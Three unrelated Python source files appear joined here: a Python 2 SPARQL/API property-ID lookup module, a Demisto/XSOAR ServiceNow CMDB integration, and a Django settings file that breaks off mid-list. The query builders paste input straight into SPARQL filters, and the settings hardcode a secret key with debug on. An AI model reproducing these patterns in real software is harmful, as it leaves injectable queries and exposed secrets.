def gatherPropIDsFromAPIendpoint( mandatory_prop_dict=None, optional_prop_dict=None, endpoint=None, from_uri=None, apikey=None ):
out = None
try:
if endpoint and from_uri and apikey:
if inputStringCheck(endpoint) and inputStringCheck(from_uri) and inputStringCheck(apikey):
if endpoint.lower() in from_uri.lower():
# Get the available resources
props = get_json( from_uri+"/properties/", apikey )
res = {u'head': {u'link': [], u'vars': [u'oo']},
u'results': {u'distinct': False, u'bindings': [], u'ordered': True}}
joined_prop_dict = mandatory_prop_dict
for k in optional_prop_dict.keys():
if k not in joined_prop_dict.keys():
joined_prop_dict[k] = optional_prop_dict[k]
for key, val in joined_prop_dict.iteritems(): # from data input (i.e. parameters)
if inputStringCheck(key):
if key not in res["head"]["vars"]:
res["head"]["vars"].append( unicode(key) )
if inputStringCheck(val):
for prop in props: # from API
if isinstance(prop, dict):
if "label" in prop.keys() and "id" in prop.keys():
if isinstance(prop["label"], (str,unicode)) and val.lower() in prop["label"].lower():
res["results"]["bindings"].append(\
{u'oo':{u'type': u'literal', u'value': unicode(prop["label"])},\
unicode(key):{u'type': u'uri', u'value': unicode(prop["id"])}})
elif isinstance(prop["label"], list):
for item in prop["label"]:
if isinstance(item, (str,unicode)) and val.lower() in item.lower():
res["results"]["bindings"].append(\
{u'oo':{u'type': u'literal', u'value': unicode(item)},\
unicode(key):{u'type': u'uri', u'value': unicode(prop["id"])}})
out = res
except:
print "Could not gather property IDs from API endpoint:", from_uri
return out
def obtainPropertyIDs( propsofi=None, endpoint=None, from_uri=None, apikey=None, endpoint_type=None ):
out = None
try:
# e.g. {'label': ['chamallow', 'pref-label', 'preferred term', 'moule a gauffre', 'editor preferred term', 'prophylaxie', 'bercail', 'nonobstant']}
m_prop_dict = extractPropertiesOnRequiredStatus( propsofi, "mandatory" )
# e.g. {'syn': ['salicorne', 'bachibouzouk', 'synonym', 'dezinguee', 'alternative term', 'cabale']}
o_prop_dict = extractPropertiesOnRequiredStatus( propsofi, "optional" )
j=0
# for keeping only the first item in the list of terms standing as value at dictionary key "None"
# e.g. {'label': 'chamallow'}
mandatory_prop_dict = { k:m_prop_dict[k][j] for k in m_prop_dict.keys() if j<len(m_prop_dict[k]) }
# e.g. {'syn': 'salicorne'}
optional_prop_dict = { k:o_prop_dict[k][j] for k in o_prop_dict.keys() if j<len(o_prop_dict[k]) }
# for being able to store best string match results between current query results and previous ones
# we increase depth of dictionary entries by making these entries (sub-)dictionaries themselves.
# e.g. {'label': {'target': 'chamallow'}}
mandat_prop_dict = { k:{"target":mandatory_prop_dict[k]} for k in mandatory_prop_dict.keys() }
# e.g. {'syn': {'target': 'salicorne'}}
option_prop_dict = { k:{"target":optional_prop_dict[k]} for k in optional_prop_dict.keys() }
max_hook_nb = max([ len(o_prop_dict[k]) for k in o_prop_dict.keys() ])
# Interrupt before end of term list in case that for each term an exact property label match has been found and thus its ID stored.
while (j==0 or j<max_hook_nb) and (not allPropertyIDsIdentified( mandat_prop_dict ) or not allPropertyIDsIdentified( option_prop_dict )):
#print query
if endpoint:
if inputStringCheck(endpoint):
# retrieving from API
if endpoint_type and inputStringCheck(endpoint_type) and endpoint_type=='api':
res = gatherPropIDsFromAPIendpoint( mandatory_prop_dict, optional_prop_dict, endpoint, from_uri, apikey )
# retrieving from SPARQL endpoint
else:
query = makeQueryForPropertyIDs( mandatory_prop_dict, optional_prop_dict )
if endpoint_type and inputStringCheck(endpoint_type) and endpoint_type=='endpoint_nsws':
res = repeatPropQueryWithDecreasingLimit( endpoint, query, from_uri, apikey, endpoint_type )
else:
res = repeatPropQueryWithDecreasingLimit( endpoint, query, from_uri, apikey )
if res:
mandat_prop_dict = updateDictWithQueryResults( mandat_prop_dict, res )
option_prop_dict = updateDictWithQueryResults( option_prop_dict, res )
j += 1
# print "\n", j
#
# print mandat_prop_dict
#
# print option_prop_dict, "\n"
mandatory_prop_dict = { k:m_prop_dict[k][j] for k in m_prop_dict.keys() if j<len(m_prop_dict[k]) }
optional_prop_dict = { k:o_prop_dict[k][j] for k in o_prop_dict.keys() if j<len(o_prop_dict[k]) }
for k in mandatory_prop_dict.keys():
if k in mandat_prop_dict.keys():
mandat_prop_dict[k]["target"] = mandatory_prop_dict[k]
for k in optional_prop_dict.keys():
if k in optional_prop_dict.keys():
option_prop_dict[k]["target"] = optional_prop_dict[k]
mandat_prop_dict = keepBestLabelsWithPerfectMatch( mandat_prop_dict )
option_prop_dict = keepBestLabelsWithPerfectMatch( option_prop_dict )
if mandat_prop_dict or option_prop_dict:
out = ( mandat_prop_dict, option_prop_dict )
except:
print "Could not proceed with obtaining property IDs."
return out
def keepBestLabelsWithPerfectMatch( prop_dict ):
out = None
try:
p_dict = {}
for k in prop_dict.keys():
if prop_dict[k]:
if type(prop_dict[k]) is dict:
if "ID" and "match" in prop_dict[k].keys():
if prop_dict[k]["ID"] and prop_dict[k]["match"]:
if type(str(prop_dict[k]["ID"])) is str and type(prop_dict[k]["match"]) is float:
if prop_dict[k]["match"] == 1:
p_dict[k] = prop_dict[k]["ID"]
if p_dict != {}: out = p_dict
except:
print "Could not proceed with keeping prop_dict best_match_labels with perfect match."
return out
def updateDictWithQueryResults( prop_dict, query_res ):
out = None
try:
if prop_dict and query_res:
if type(prop_dict) is dict and type(query_res) is dict:
if "head" in query_res.keys():
if "vars" in query_res["head"]:
if "results" in query_res.keys():
if "bindings" in query_res["results"]:
for content in query_res["results"]["bindings"]:
for item in query_res["head"]["vars"]: # item = "oo", "label", "def" (sparql_var)
if item in content.keys():
if 'value' in content[item].keys():
if item in prop_dict.keys():
if type(prop_dict[item]) is dict:
if "ID" not in prop_dict[item].keys():
if "oo" in content.keys():
if 'value' in content["oo"].keys() and "target" in prop_dict[item].keys():
prop_dict[item]["ID"] = content[item]['value']
prop_dict[item]["best_match_label"] = content["oo"]['value']
prop_dict[item]["match"] = stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] )
elif "target" in prop_dict[item].keys() and "match" in prop_dict[item].keys() and "oo" in content.keys():
if 'value' in content["oo"].keys() and type(str(prop_dict[item]["target"])) is str and type(prop_dict[item]["match"]) is float:
if stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] ) > prop_dict[item]["match"]:
prop_dict[item]["ID"] = content[item]['value']
prop_dict[item]["best_match_label"] = content["oo"]['value']
prop_dict[item]["match"] = stringSimilarity( content["oo"]['value'], prop_dict[item]["target"] )
out = prop_dict
except:
print "Could not update dictionary with query results."
return out
def allPropertyIDsIdentified( prop_dict ):
out = None
allIDs = True
try:
if prop_dict:
if type(prop_dict) is dict:
for item in prop_dict.keys():
if "ID" in prop_dict[item].keys() and "match" in prop_dict[item].keys():
if type(str(prop_dict[item]["ID"])) is str and type(prop_dict[item]["match"]) is float:
if prop_dict[item]["match"] < 1:
allIDs = False
break
else:
allIDs = False
else:
allIDs = False
out = allIDs
except:
print "Could not proceed with checking that all properties were identified."
return out
def switchKeysSparql2OntoClass(pids, propsofi):
out = None
try:
if pids and propsofi:
if isinstance(pids, tuple) and isinstance(propsofi, list):
new_pids = tuple()
for p in pids:
if isinstance(p, dict):
switched = {}
for key in p.keys():
if key and isinstance(key, (str, unicode)):
for prop in propsofi:
if isinstance(prop, dict):
if "output_name" and "sparql_var" in prop.keys():
if isinstance(prop["sparql_var"], (str, unicode)) and isinstance(prop["output_name"], (str, unicode)):
if prop["sparql_var"] == key:
switched[prop["output_name"]] = key
break
if switched:
new_pids += (switched,)
else:
new_pids += (p,)
out = new_pids
except:
print "Could not switch pids dict keys from sparql to onto_class attribute field name."
return out
def extractPropertiesOnRequiredStatus( propsofi=None, keyword=None ):
out = None
try:
if propsofi and keyword:
if type(propsofi) is list and type(keyword) is str:
out = {}
for prop in propsofi:
if "required_status" in prop.keys():
if prop["required_status"] == keyword:
if "sparql_var" in prop.keys():
if None in prop.keys():
for hook_str in prop[None]:
if prop["sparql_var"] in out.keys():
out[prop["sparql_var"]].append(hook_str)
else:
out[prop["sparql_var"]] = [hook_str]
except:
print "Could not extract properties based on keyword:", keyword
return out
def reformatpidsForAPIuse(pids=None, propsofi=None):
out = None
try:
if pids and propsofi:
if isinstance(propsofi, list) and isinstance(pids, tuple):
meta_pids = None
meta_pids = extractPropertiesOnRequiredStatus(propsofi, "automatic")
meta_pids = switchKeysSparql2OntoClass((meta_pids,), propsofi)
if meta_pids and isinstance(meta_pids, tuple) and len(meta_pids)==1:
meta_pids = meta_pids[0]
else:
meta_pids = None
pids_out = None
pids_out = switchKeysSparql2OntoClass(pids, propsofi)
if meta_pids and pids_out:
if isinstance(meta_pids, dict) and isinstance(pids_out, tuple):
for k in meta_pids.keys():
if isinstance(k, (str, unicode)) and isinstance(meta_pids[k], (str, unicode)):
if k and meta_pids[k]:
replaced = False
for p in pids_out:
if isinstance( p, dict ):
if k in p.keys():
p[k] = unicode(meta_pids[k])
replaced = True
break
if not replaced:
if len(pids_out)>0:
if isinstance( pids_out[1], dict ):
pids_out[1][k] = unicode(meta_pids[k])
else:
pids_out += ({k:unicode(meta_pids[k])},)
if pids_out: out = pids_out
except:
print "Could not reformat pids structure for API use."
return out
def makeQueryForPropertyIDs( mandatory_prop_dict=None, optional_prop_dict=None ):
out = None
try:
query = "SELECT DISTINCT ?oo"
if mandatory_prop_dict:
if type(mandatory_prop_dict) is dict:
for m in mandatory_prop_dict.keys():
if inputStringCheck( m ) and inputStringCheck(mandatory_prop_dict[m]):
query += " ?" + m
if optional_prop_dict:
if type(optional_prop_dict) is dict:
for o in optional_prop_dict.keys():
if inputStringCheck( o ) and inputStringCheck(optional_prop_dict[o]):
query += " ?" + o
query += "\nWHERE { \n"
allButFirst = False
if mandatory_prop_dict:
if type(mandatory_prop_dict) is dict:
for m in mandatory_prop_dict.keys():
if inputStringCheck( m ) and inputStringCheck( mandatory_prop_dict[m] ):
if allButFirst:
query += "UNION\n"
else:
allButFirst = True
query += " {\n"
query += " ?s ?" + m + " ?o .\n"
query += " ?" + m + " ?pp ?oo .\n"
#query += " FILTER(CONTAINS(LCASE(str(?oo)), LCASE('" + mandatory_prop_dict[m] + "')))\n"
# abremaud@esciencefactory.com, 20160209
# Problem:
# Query using REGEX not optimally efficient, orders of magnitude heavier burden
# on sparql engine server side compared to sparql native expressions such as CONTAINS.
# Sources:
# http://stackoverflow.com/questions/12353537/sparql-exact-match-regex
# http://www.cray.com/blog/dont-use-hammer-screw-nail-alternatives-regex-sparql/
#
# abremaud@esciencefactory.com, 20160310
# Back to original less performance oriented design due to Ontobee endpoint handling neither
# CONTAINS nor LCASE functionalities.
query += " FILTER REGEX(str(?oo), '" + mandatory_prop_dict[m] + "', 'i')\n"
query += " }\n"
# abremaud@esciencefactory.com, 20160212
# Could maybe catch predicates on perfect match to last portion of uri character sequence.
# query += "UNION\n"
# query += " {\n"
# query += " ?s ?" + m + " ?o .\n"
# query += " ?" + m + " ?pp ?oo .\n"
# query += " FILTER(STREND(LCASE(str(?" + m + ")), LCASE('" + mandatory_prop_dict[m] + "')))\n"
# query += " }\n"
if optional_prop_dict:
if type(optional_prop_dict) is dict:
for o in optional_prop_dict.keys():
if inputStringCheck( o ) and inputStringCheck( optional_prop_dict[o] ):
if allButFirst:
query += "UNION\n"
else:
allButFirst = True
query += " {\n"
query += " ?s ?" + o + " ?o .\n"
query += " ?" + o + " ?pp ?oo .\n"
#query += " FILTER(CONTAINS(LCASE(str(?oo)), LCASE('" + optional_prop_dict[o] + "')))\n"
# abremaud@esciencefactory.com, 20160209
# See above for an explanation.
query += " FILTER REGEX(str(?oo), '" + optional_prop_dict[o] + "', 'i')\n"
query += " }\n"
query += "}"
out = query
except:
print "Could not write down sparql query for property IDs."
return out
def makeQueryForPropertyValues( pids = None ):
out = None
try:
query = "SELECT DISTINCT ?id"
if pids:
if isinstance(pids, tuple) and len(pids)>0:
for p in pids:
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ):
query += " ?" + str(k)
query += "\nWHERE { \n"
if pids:
if isinstance(pids, tuple) and len(pids)>0:
p = pids[0]
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ) and inputStringCheck( str(p[k]) ):
query += " ?id <" + str(p[k]) +"> ?" + str(k) + " .\n"
if isinstance(pids, tuple) and len(pids)>1:
p = pids[1]
if isinstance(p, dict):
for k in p.keys():
if inputStringCheck( str(k) ) and inputStringCheck( str(p[k]) ):
query += " OPTIONAL{ ?id <" + str(p[k]) +"> ?" + str(k) + " . }\n"
query += "}"
out = query
except:
print "Could not write down sparql query for property values."
return out
def sparqlLocalFile( filepath, query ):
out = None
g = Graph()
try:
g.parse( filepath, format=filepath[::-1][:filepath[::-1].find(".")][::-1] )
try:
out = g.query(query).serialize(format="json")
out = json.loads(out)
except:
print "Could not process formulated query on indicated file."
pass
except:
print "Could not parse indicated file:", filepath
pass
return out
def csv2list( filepath ):
out = None
try:
with open( filepath, 'rb' ) as csvfile:
temp = csv.DictReader( csvfile, fieldnames=None, restkey=None, restval='', dialect='excel', delimiter=';' )
out = []
for row in temp:
out.append( row )
except:
print "Could not load CSV file:", filepath
pass
return out
| |
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
'''IMPORTS'''
import urllib3
import traceback
from typing import Any, Dict, Tuple, List
from _collections import defaultdict
import ast
from operator import itemgetter
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
API_VERSION = '/api/now/cmdb/instance/'
CREAT_RECORD_DATA_FIELDS = ['attributes', 'inbound_relations', 'outbound_relations', 'source']
UPDATE_RECORD_DATA_FIELDS = ['attributes', 'source']
ADD_RELATION_DATA_FIELDS = ['inbound_relations', 'outbound_relations', 'source']
FIELD_TO_OUTPUT = {
'inbound_relations': 'Inbound Relations',
'outbound_relations': 'Outbound Relations'
}
class Client:
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
"""
def __init__(self, credentials: dict, use_oauth: bool = False, client_id: str = '', client_secret: str = '',
url: str = '', verify: bool = False, proxy: bool = False):
"""
Args:
- credentials: the username and password given by the user.
- client_id: the client id of the application of the user.
- client_secret - the client secret of the application of the user.
- url: the instance url of the user, i.e: https://<instance>.service-now.com.
NOTE - url should be given without an API specific suffix as it is also used for the OAuth process.
- insecure: Whether the request should verify the SSL certificate.
- proxy: Whether to run the integration using the system proxy.
- headers: The request headers, for example: {'Accept`: `application/json`}. Can be None.
- use_oauth: a flag indicating whether the user wants to use OAuth 2.0 or basic authorization.
"""
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
self.use_oauth = use_oauth
self.snow_client: ServiceNowClient = ServiceNowClient(credentials=credentials, use_oauth=use_oauth,
client_id=client_id, client_secret=client_secret,
url=url, verify=verify, proxy=proxy, headers=headers)
def records_list(self, class_name, params=None):
return self.snow_client.http_request(method='GET', url_suffix=f'{API_VERSION}{class_name}', params=params)
def get_record(self, class_name, sys_id, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}'
return self.snow_client.http_request(method='GET', url_suffix=url_suffix, params=params)
def create_record(self, class_name, data, params=None):
return self.snow_client.http_request(method='POST', url_suffix=f'{API_VERSION}{class_name}', params=params, data=data)
def update_record(self, class_name, sys_id, data, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}'
return self.snow_client.http_request(method='PATCH', url_suffix=url_suffix, params=params, data=data)
def add_relation(self, class_name, sys_id, data, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}/relation'
return self.snow_client.http_request(method='POST', url_suffix=url_suffix, params=params, data=data)
def delete_relation(self, class_name, sys_id, rel_sys_id, params=None):
url_suffix = f'{API_VERSION}{class_name}/{sys_id}/relation/{rel_sys_id}'
return self.snow_client.http_request(method='DELETE', url_suffix=url_suffix, params=params)
''' HELPER FUNCTIONS '''
def create_request_data(data_fields: List, args: dict) -> dict:
"""
This function converts the input given by the user when creating a new record to a data dict that should be passed
in the http request.
Args:
data_fields: A list with the fields that should be added to the data.
args: The arguments that were filled by the user.
Returns:
A dictionary representing the data parameter that should be sent in the http request.
"""
data = {}
for field in data_fields:
if field == 'source':
data[field] = args.get(field)
elif field == 'attributes': # 'attributes' input should be of the form key1=value1,key2=value2...
val = args.get(field)
if val:
try:
attributes_dict = {}
attributes_input = val.split(',')
for attribute in attributes_input:
pair = attribute.split('=')
attributes_dict[pair[0]] = pair[1]
data[field] = attributes_dict
except Exception:
raise Exception('Illegal input. Input format should be "key=value". Multiple values can be filled, '
'separated by a comma.')
else: # other fields should be converted to dict/list
val = args.get(field)
if val:
try:
data[field] = ast.literal_eval(val)
except Exception:
raise Exception('Illegal input. Please see the argument description for the correct input format.')
return data
def create_record_context(class_name: str, sys_id: str, result: dict) -> dict:
"""
Create the context output for commands that operate on a single record.
Args:
class_name: The class name of the record used.
sys_id: The id of the record.
result: The raw response from the http request.
Return:
A dictionary representing the context output for the record.
"""
context = {
'ServiceNowCMDB.Record(val.ID===obj.ID)': {
'Class': class_name,
'SysID': sys_id,
'Attributes': result.get('attributes', {}),
'InboundRelations': result.get('inbound_relations', []),
'OutboundRelations': result.get('outbound_relations', []),
}
}
return context
def create_human_readable(title: str, result: dict, fields: str) -> str:
"""
Create the human readable output for commands.
Args:
title: The title of the human readable output.
result: The raw response from the http request consisting of the attributes, inbound_relations and
outbound_relations fields.
fields: A string representing all the fields of the record the client specified that should be returned. If no
fields were specified, only the record name and sys_id will be displayed in the war room.
Return:
A string representing the markdown output that should be displayed in the war room.
"""
md = f'{title}\n'
attributes_outputs = {}
if fields:
for field in fields.split(','):
if result.get('attributes', {}).get(field):
attributes_outputs[string_to_context_key(field)] = result.get('attributes', {}).get(field)
else:
attributes_outputs = {
'SysID': result.get('attributes', {}).get('sys_id'),
'Name': result.get('attributes', {}).get('name')
}
md += tableToMarkdown('Attributes', t=attributes_outputs, removeNull=True)
for relation_type in ['inbound_relations', 'outbound_relations']:
relations = result.get(relation_type)
if relations:
relation_output = {
'SysID': list(map(itemgetter('sys_id'), relations)),
'Target Display Value': list(
map(itemgetter('display_value'), list(map(itemgetter('target'), result.get(relation_type))))), # type: ignore
'Type Display Value': list(
map(itemgetter('display_value'), list(map(itemgetter('type'), result.get(relation_type))))), # type: ignore
}
md += f' {tableToMarkdown(FIELD_TO_OUTPUT.get(relation_type), t=relation_output)}'
return md
''' COMMAND FUNCTIONS '''
def records_list_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Query a CMDB table using the class name to receive all records in the class.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class')
params = {}
if args.get('query'):
params['sysparm_query'] = args.get('query')
if args.get('limit'):
params['sysparm_limit'] = args.get('limit')
if args.get('offset'):
params['sysparm_offset'] = args.get('offset')
outputs = {
'Class': class_name
}
response = client.records_list(class_name=class_name, params=params)
result = response.get('result', {})
if result:
outputs['Records'] = result
human_readable = tableToMarkdown(f'Found {len(result)} records for class {class_name}:', t=result)
else:
human_readable = f'Found no records for class {class_name}.'
context['ServiceNowCMDB(val.ID===obj.ID)'] = outputs
return human_readable, context, response
def get_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Query attributes and relationship information for a specific record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class')
sys_id = args.get('sys_id')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
response = client.get_record(class_name=class_name, sys_id=sys_id, params=params)
result = response.get('result')
if result:
context['ServiceNowCMDB.Record(val.ID===obj.ID)'] = {
'Class': class_name,
'SysID': sys_id,
'Attributes': result.get('attributes', {}),
'InboundRelations': result.get('inbound_relations', []),
'OutboundRelations': result.get('outbound_relations', []),
}
hr_title = f'### Found the following attributes and relations for record {sys_id}:'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
context['ServiceNowCMDB.Record(val.ID===obj.ID)'] = {
'Class': class_name,
'SysID': sys_id
}
human_readable = f'Found no attributes and relations for record {sys_id}.'
return human_readable, context, response
def create_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Create a record with associated relations.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(CREAT_RECORD_DATA_FIELDS, args)
response = client.create_record(class_name=class_name, params=params, data=str(data))
result = response.get('result')
if result:
sys_id = result.get('attributes', {}).get('sys_id')
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Record {sys_id} was created successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = 'Failed to create a new record.'
return human_readable, context, response
def update_record_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Update a record with attributes given by the user.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(UPDATE_RECORD_DATA_FIELDS, args)
response = client.update_record(class_name=class_name, sys_id=sys_id, data=str(data), params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Updated record {sys_id} successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to update record {sys_id}.'
return human_readable, context, response
def add_relation_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Add new relations to an existing record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
data = create_request_data(ADD_RELATION_DATA_FIELDS, args)
response = client.add_relation(class_name=class_name, sys_id=sys_id, data=str(data), params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### New relations were added to {sys_id} record successfully.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to add new relations to record {sys_id}.'
return human_readable, context, response
def delete_relation_command(client: Client, args: dict) -> Tuple[str, dict, Any]:
"""
Delete relations for an existing record.
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
context: dict = defaultdict(list)
class_name = args.get('class', '')
sys_id = args.get('sys_id', '')
rel_sys_id = args.get('relation_sys_id', '')
params: dict = {}
if args.get('fields'):
params['sysparm_fields'] = args.get('fields')
# Verify that sys_id and name were added so they can be used in the output of the command:
if 'sys_id' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',sys_id'
if 'name' not in params.get('sysparm_fields', ''):
params['sysparm_fields'] += ',name'
if args.get('relation_limit'):
params['sysparm_relation_limit'] = args.get('relation_limit')
if args.get('relation_offset'):
params['sysparm_relation_offset'] = args.get('relation_offset')
response = client.delete_relation(class_name=class_name, sys_id=sys_id, rel_sys_id=rel_sys_id, params=params)
result = response.get('result')
if result:
context = create_record_context(class_name, sys_id, result)
hr_title = f'### Deleted relation {rel_sys_id} successfully from {sys_id} record.'
human_readable = create_human_readable(hr_title, result, params.get('sysparm_fields', ''))
else:
human_readable = f'Failed to delete relation {rel_sys_id} from record {sys_id}.'
return human_readable, context, response
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: ServiceNow CMDB client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
# Notify the user that test button can't be used when using OAuth 2.0:
if client.use_oauth:
return_error('Test button cannot be used when using OAuth 2.0. Please use the !servicenow-cmdb-oauth-login '
'command followed by the !servicenow-cmdb-oauth-test command to test the instance.')
try:
client.records_list(class_name='cmdb_ci_linux_server')
except Exception as e:
raise e
return 'ok'
def oauth_test_module(client: Client, *_) -> Tuple[str, Dict[Any, Any], Dict[Any, Any]]:
"""
Test the instance configurations when using OAuth authorization.
"""
if not client.use_oauth:
return_error('!servicenow-cmdb-oauth-test command should be used only when using OAuth 2.0 authorization.\n '
'Please select the `Use OAuth Login` checkbox in the instance configuration before running this '
'command.')
try:
client.records_list(class_name='cmdb_ci_linux_server')
except Exception as e:
raise e
hr = '### Instance Configured Successfully.\n'
return hr, {}, {}
def login_command(client: Client, args: Dict[str, Any]) -> Tuple[str, Dict[Any, Any], Dict[Any, Any]]:
"""
Login the user using OAuth authorization
Args:
client: Client object with request.
args: Usually demisto.args()
Returns:
Demisto Outputs.
"""
# Verify that the user selected the `Use OAuth Login` checkbox:
if not client.use_oauth:
return_error('!servicenow-cmdb-oauth-login command can be used only when using OAuth 2.0 authorization.\n '
'Please select the `Use OAuth Login` checkbox in the instance configuration before running this '
'command.')
username = args.get('username', '')
password = args.get('password', '')
try:
client.snow_client.login(username, password)
hr = '### Logged in successfully.\n A refresh token was saved to the integration context and will be ' \
'used to generate a new access token once the current one expires.'
except Exception as e:
return_error(f'Failed to login. Please verify that the provided username and password are correct, and that you'
f' entered the correct client id and client secret in the instance configuration (see ? for'
f'correct usage when using OAuth).\n\n{e}')
return hr, {}, {}
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
"""
params = demisto.params()
url = params.get('url', '')
verify = not params.get('insecure', False)
proxy = params.get('proxy', False)
client_id = client_secret = ''
credentials = params.get('credentials', {})
use_oauth = params.get('use_oauth', False)
if use_oauth:
client_id = credentials.get('identifier')
client_secret = credentials.get('password')
client = Client(credentials=credentials, use_oauth=use_oauth, client_id=client_id,
client_secret=client_secret, url=url, verify=verify, proxy=proxy)
commands = {
'servicenow-cmdb-oauth-login': login_command,
'servicenow-cmdb-oauth-test': oauth_test_module,
'servicenow-cmdb-records-list': records_list_command,
'servicenow-cmdb-record-get-by-id': get_record_command,
'servicenow-cmdb-record-create': create_record_command,
'servicenow-cmdb-record-update': update_record_command,
'servicenow-cmdb-record-add-relations': add_relation_command,
'servicenow-cmdb-record-delete-relations': delete_relation_command
}
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
return_results(result)
elif command in commands:
return_outputs(*commands[command](client, demisto.args())) # type: ignore
else:
return_error('Command not found.')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {command} command.\nError:\n{str(e)}')
from ServiceNowApiModule import * # noqa: E402
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| |
"""
Django settings for timecounter project.
Generated by 'django-admin startproject' using Django 1.8.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SITE_ID = 1
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_7(h-e9a!me5gshvyfb4kxv!=_oek$bcfj&+ays)e7tfnfg%^i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES_DEBUG = DEBUG
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
'users',
'dashboard',
'debug_toolbar',
'local_core'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
